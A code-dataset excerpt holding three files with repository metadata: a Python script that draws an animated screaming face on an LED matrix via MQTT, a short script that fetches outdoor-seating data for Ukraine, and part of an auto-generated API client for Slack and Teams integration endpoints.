| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 11
|
b75c06f8d378320761db133540ce803b8ed6fd94
| 13,175
|
py
|
Python
|
animations/yellow-screamy.py
|
SteffiPeTaffy/draw
|
b8a31a42a8b5c5bf8ab2c33ce1c58d82ff1e97df
|
[
"Unlicense"
] | 2
|
2021-02-07T17:07:42.000Z
|
2021-02-13T18:17:49.000Z
|
animations/yellow-screamy.py
|
SteffiPeTaffy/draw
|
b8a31a42a8b5c5bf8ab2c33ce1c58d82ff1e97df
|
[
"Unlicense"
] | null | null | null |
animations/yellow-screamy.py
|
SteffiPeTaffy/draw
|
b8a31a42a8b5c5bf8ab2c33ce1c58d82ff1e97df
|
[
"Unlicense"
] | null | null | null |
import paho.mqtt.client as mqtt
import time

# --- MQTT connection -------------------------------------------------------
# Public broker relaying draw commands to the LED matrix.
broker_address = 'broker.emqx.io'
broker_port = 1883
client = mqtt.Client('SteffiPeTaffy')
client.connect(broker_address, broker_port)
topic = "lieblingswelt/draw"

# --- palette (RGB triples) -------------------------------------------------
yellow = [254, 254, 84]
black = [0, 0, 0]
white = [254, 254, 254]
red = [254, 0, 0]


def draw_pixel(x, y, colour):
    """Publish one pixel update; the wire format is [column, row, r, g, b]."""
    client.publish(topic, bytearray([x, y, colour[0], colour[1], colour[2]]))


def draw_span(x_start, x_end, y, colour):
    """Colour the horizontal run of pixels x_start..x_end (inclusive) on row y."""
    for x in range(x_start, x_end + 1):
        draw_pixel(x, y, colour)


def move_pupils(x_clear, x_fill):
    """Shift both pupils sideways: blank column ``x_clear`` of each eye back
    to white and paint column ``x_fill`` black.  The right eye is offset
    9 columns from the left one; rows 4-5 hold the pupils."""
    for clear, fill in ((x_clear, x_fill), (x_clear + 9, x_fill + 9)):
        draw_pixel(clear, 4, white)
        draw_pixel(clear, 5, white)
        draw_pixel(fill, 4, black)
        draw_pixel(fill, 5, black)


# --- 16x16 face bitmap, row-major: face[row][column] -----------------------
# Built from shared row templates instead of the original 16 hand-written
# literal rows; the resulting pixel values are identical.
blank_row = [yellow] * 16
eye_outline = [yellow] + [black] * 5 + [yellow] * 4 + [black] * 5 + [yellow]
eye_open = [black] + [white] * 5 + [black] + [yellow] * 2 + [black] + [white] * 5 + [black]
eye_pupil = ([black, white, white, black, white, white, black] + [yellow] * 2 +
             [black, white, white, black, white, white, black])
face = ([blank_row] * 2 +
        [eye_outline, eye_open, eye_pupil, eye_pupil, eye_open, eye_outline] +
        [blank_row] * 8)

# Paint the initial face pixel by pixel (payload is [column, row, ...],
# hence the swapped indices), pausing 0.2 s per pixel as before.
for row in range(16):
    for col in range(16):
        draw_pixel(col, row, face[row][col])
        time.sleep(0.2)

# Five rounds of the animation: eyes dart around, then the mouth screams.
for _ in range(5):
    # pupils: mid -> right
    move_pupils(3, 4)
    time.sleep(2)
    # pupils: right -> mid
    move_pupils(4, 3)
    time.sleep(2)
    # pupils: mid -> left
    move_pupils(3, 2)
    time.sleep(2)
    # pupils: left -> mid
    move_pupils(2, 3)
    time.sleep(2)
    # closed mouth: a single black line on row 13
    draw_span(3, 11, 13, black)
    time.sleep(1)
    # slightly opened mouth: thin red band outlined in black
    draw_pixel(3, 12, black)
    draw_span(4, 10, 12, red)
    draw_pixel(11, 12, black)
    draw_span(4, 10, 11, black)
    time.sleep(1)
    # fully opened mouth: three red rows framed in black
    for y in (12, 11, 10):
        draw_pixel(3, y, black)
        draw_span(4, 10, y, red)
        draw_pixel(11, y, black)
    draw_span(4, 10, 9, black)
    time.sleep(2)
    # no mouth: restore the yellow face
    for y in (12, 11, 10):
        draw_span(3, 11, y, yellow)
    draw_span(4, 10, 9, yellow)
    draw_span(3, 11, 13, yellow)
    time.sleep(1)

client.disconnect()
print('done!')
| 58.039648
| 119
| 0.637192
| 2,001
| 13,175
| 4.193403
| 0.031984
| 0.243118
| 0.347515
| 0.451913
| 0.952926
| 0.949589
| 0.93779
| 0.930402
| 0.930402
| 0.920391
| 0
| 0.075071
| 0.148691
| 13,175
| 226
| 120
| 58.29646
| 0.673056
| 0.010019
| 0
| 0.359375
| 0
| 0
| 0.003836
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010417
| 0
| 0.010417
| 0.005208
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b7ab36ee5d58bed03c58fbfddefdc68cafa579fe
| 132
|
py
|
Python
|
main.py
|
rapkin/osm-quarantine-eat-out
|
9741458f118cac289479a110ae8abbeabb7deb55
|
[
"MIT"
] | 1
|
2020-05-16T15:57:58.000Z
|
2020-05-16T15:57:58.000Z
|
main.py
|
rapkin/osm-quarantine-eat-out
|
9741458f118cac289479a110ae8abbeabb7deb55
|
[
"MIT"
] | null | null | null |
main.py
|
rapkin/osm-quarantine-eat-out
|
9741458f118cac289479a110ae8abbeabb7deb55
|
[
"MIT"
] | null | null | null |
from download_data import get_outdoor_seatings_for_country

# Country to fetch outdoor-seating data for.
country_name = 'Ukraine'

if __name__ == '__main__':
    # Guard the call so importing this module triggers no download.
    get_outdoor_seatings_for_country(country_name)
| 26.4
| 58
| 0.893939
| 19
| 132
| 5.631579
| 0.578947
| 0.186916
| 0.336449
| 0.392523
| 0.728972
| 0.728972
| 0.728972
| 0
| 0
| 0
| 0
| 0
| 0.068182
| 132
| 4
| 59
| 33
| 0.869919
| 0
| 0
| 0
| 0
| 0
| 0.05303
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b7ff724437975fc6a6a9b411e6de2d9975413a2d
| 115,183
|
py
|
Python
|
elements_sdk/api/integrations_api.py
|
elements-storage/elements-sdk-python
|
39c365fe079dcd5928c5fe1bbaa67389bd5a3d81
|
[
"MIT"
] | 6
|
2020-11-16T23:15:18.000Z
|
2022-03-14T03:56:12.000Z
|
elements_sdk/api/integrations_api.py
|
elements-storage/elements-sdk-python
|
39c365fe079dcd5928c5fe1bbaa67389bd5a3d81
|
[
"MIT"
] | 1
|
2021-07-28T13:03:49.000Z
|
2021-08-25T12:24:01.000Z
|
elements_sdk/api/integrations_api.py
|
elements-storage/elements-sdk-python
|
39c365fe079dcd5928c5fe1bbaa67389bd5a3d81
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
ELEMENTS API
The version of the OpenAPI document: 2
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from elements_sdk.api_client import ApiClient
from elements_sdk.exceptions import (
ApiTypeError,
ApiValueError
)
class IntegrationsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_slack_connection(self, id, **kwargs): # noqa: E501
"""delete_slack_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_slack_connection(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Slack connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_slack_connection_with_http_info(id, **kwargs) # noqa: E501
def delete_slack_connection_with_http_info(self, id, **kwargs):  # noqa: E501
    """delete_slack_connection  # noqa: E501

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_slack_connection_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # NOTE: auto-generated by OpenAPI Generator; the statement order below
    # follows the generator template and should be kept as is.
    local_var_params = locals()

    # Names this endpoint accepts: the path parameter plus the generic
    # client-level request options.
    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then flatten kwargs into the
    # params dict so every option is addressed by name.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_slack_connection" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `delete_slack_connection`")  # noqa: E501

    collection_formats = {}

    # Substituted into the '{id}' segment of the URL template below.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # DELETE carries no request body.
    body_params = None
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/api/2/integrations/slack/{id}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def delete_teams_connection(self, id, **kwargs): # noqa: E501
"""delete_teams_connection # noqa: E501
### Required permissions * User account permission: `None` (read) / `system:admin-access` (write) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_teams_connection(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this Teams connection. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_teams_connection_with_http_info(id, **kwargs) # noqa: E501
def delete_teams_connection_with_http_info(self, id, **kwargs):  # noqa: E501
    """delete_teams_connection  # noqa: E501

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_teams_connection_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of the call arguments (self, id, kwargs). Must be taken
    # before any other local is bound, or that local would leak into it.
    local_var_params = locals()

    # Whitelist of keyword arguments this endpoint accepts.
    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown kwargs, then flatten the accepted ones into the
    # captured parameter dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_teams_connection" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `delete_teams_connection`")  # noqa: E501

    collection_formats = {}

    # Substituted into the `{id}` placeholder of the resource path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # DELETE carries no request body.
    body_params = None
    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/api/2/integrations/teams/{id}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_all_slack_connections(self, **kwargs):  # noqa: E501
    """get_all_slack_connections  # noqa: E501

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)  # noqa: E501
    Synchronous by default; pass async_req=True to execute the request on
    a worker thread and receive the thread object instead.
    >>> thread = api.get_all_slack_connections(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str ordering: Which field to use when ordering the results.
    :param int limit: Number of results to return per page.
    :param int offset: The initial index from which to return the results.
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: list[SlackConnection]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info twin, forcing data-only return so
    # callers get the deserialized body rather than a (data, status,
    # headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_all_slack_connections_with_http_info(**forwarded)  # noqa: E501
def get_all_slack_connections_with_http_info(self, **kwargs):  # noqa: E501
    """get_all_slack_connections  # noqa: E501

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_all_slack_connections_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str ordering: Which field to use when ordering the results.
    :param int limit: Number of results to return per page.
    :param int offset: The initial index from which to return the results.
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[SlackConnection], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of the call arguments (self, kwargs). Must be taken before
    # any other local is bound, or that local would leak into it.
    local_var_params = locals()

    # Whitelist of keyword arguments this endpoint accepts.
    all_params = ['ordering', 'limit', 'offset']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown kwargs, then flatten the accepted ones into the
    # captured parameter dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_all_slack_connections" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}

    path_params = {}

    # Optional pagination/ordering query parameters; only forwarded when
    # explicitly supplied by the caller.
    query_params = []
    if 'ordering' in local_var_params and local_var_params['ordering'] is not None:  # noqa: E501
        query_params.append(('ordering', local_var_params['ordering']))  # noqa: E501
    if 'limit' in local_var_params and local_var_params['limit'] is not None:  # noqa: E501
        query_params.append(('limit', local_var_params['limit']))  # noqa: E501
    if 'offset' in local_var_params and local_var_params['offset'] is not None:  # noqa: E501
        query_params.append(('offset', local_var_params['offset']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET carries no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/api/2/integrations/slack', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[SlackConnection]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_all_teams_connections(self, **kwargs):  # noqa: E501
    """get_all_teams_connections  # noqa: E501

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)  # noqa: E501
    Synchronous by default; pass async_req=True to execute the request on
    a worker thread and receive the thread object instead.
    >>> thread = api.get_all_teams_connections(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str ordering: Which field to use when ordering the results.
    :param int limit: Number of results to return per page.
    :param int offset: The initial index from which to return the results.
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: list[TeamsConnection]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info twin, forcing data-only return so
    # callers get the deserialized body rather than a (data, status,
    # headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_all_teams_connections_with_http_info(**forwarded)  # noqa: E501
def get_all_teams_connections_with_http_info(self, **kwargs):  # noqa: E501
    """get_all_teams_connections  # noqa: E501

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_all_teams_connections_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str ordering: Which field to use when ordering the results.
    :param int limit: Number of results to return per page.
    :param int offset: The initial index from which to return the results.
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[TeamsConnection], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of the call arguments (self, kwargs). Must be taken before
    # any other local is bound, or that local would leak into it.
    local_var_params = locals()

    # Whitelist of keyword arguments this endpoint accepts.
    all_params = ['ordering', 'limit', 'offset']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown kwargs, then flatten the accepted ones into the
    # captured parameter dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_all_teams_connections" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}

    path_params = {}

    # Optional pagination/ordering query parameters; only forwarded when
    # explicitly supplied by the caller.
    query_params = []
    if 'ordering' in local_var_params and local_var_params['ordering'] is not None:  # noqa: E501
        query_params.append(('ordering', local_var_params['ordering']))  # noqa: E501
    if 'limit' in local_var_params and local_var_params['limit'] is not None:  # noqa: E501
        query_params.append(('limit', local_var_params['limit']))  # noqa: E501
    if 'offset' in local_var_params and local_var_params['offset'] is not None:  # noqa: E501
        query_params.append(('offset', local_var_params['offset']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET carries no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/api/2/integrations/teams', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[TeamsConnection]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_slack_channels(self, id, **kwargs):  # noqa: E501
    """get_slack_channels  # noqa: E501

    ### Required permissions * User account permission: `tasks:manage`  # noqa: E501
    Synchronous by default; pass async_req=True to execute the request on
    a worker thread and receive the thread object instead.
    >>> thread = api.get_slack_channels(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: list[SlackChannel]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info twin, forcing data-only return so
    # callers get the deserialized body rather than a (data, status,
    # headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_slack_channels_with_http_info(id, **forwarded)  # noqa: E501
def get_slack_channels_with_http_info(self, id, **kwargs):  # noqa: E501
    """get_slack_channels  # noqa: E501

    ### Required permissions * User account permission: `tasks:manage`  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_slack_channels_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[SlackChannel], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of the call arguments (self, id, kwargs). Must be taken
    # before any other local is bound, or that local would leak into it.
    local_var_params = locals()

    # Whitelist of keyword arguments this endpoint accepts.
    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown kwargs, then flatten the accepted ones into the
    # captured parameter dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_slack_channels" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `get_slack_channels`")  # noqa: E501

    collection_formats = {}

    # Substituted into the `{id}` placeholder of the resource path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET carries no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/api/2/integrations/slack/{id}/channels', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[SlackChannel]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_slack_connection(self, id, **kwargs):  # noqa: E501
    """get_slack_connection  # noqa: E501

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)  # noqa: E501
    Synchronous by default; pass async_req=True to execute the request on
    a worker thread and receive the thread object instead.
    >>> thread = api.get_slack_connection(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: SlackConnection
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info twin, forcing data-only return so
    # callers get the deserialized body rather than a (data, status,
    # headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_slack_connection_with_http_info(id, **forwarded)  # noqa: E501
def get_slack_connection_with_http_info(self, id, **kwargs):  # noqa: E501
    """get_slack_connection  # noqa: E501

    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_slack_connection_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(SlackConnection, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # Snapshot of the call arguments (self, id, kwargs). Must be taken
    # before any other local is bound, or that local would leak into it.
    local_var_params = locals()

    # Whitelist of keyword arguments this endpoint accepts.
    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown kwargs, then flatten the accepted ones into the
    # captured parameter dict.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_slack_connection" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `get_slack_connection`")  # noqa: E501

    collection_formats = {}

    # Substituted into the `{id}` placeholder of the resource path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET carries no request body.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/api/2/integrations/slack/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SlackConnection',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_slack_emoji(self, id, **kwargs):  # noqa: E501
    """get_slack_emoji  # noqa: E501

    ### Required permissions * User account permission: `tasks:manage`  # noqa: E501
    Synchronous by default; pass async_req=True to execute the request on
    a worker thread and receive the thread object instead.
    >>> thread = api.get_slack_emoji(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: list[SlackEmoji]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Delegate to the *_with_http_info twin, forcing data-only return so
    # callers get the deserialized body rather than a (data, status,
    # headers) tuple.
    forwarded = dict(kwargs, _return_http_data_only=True)
    return self.get_slack_emoji_with_http_info(id, **forwarded)  # noqa: E501
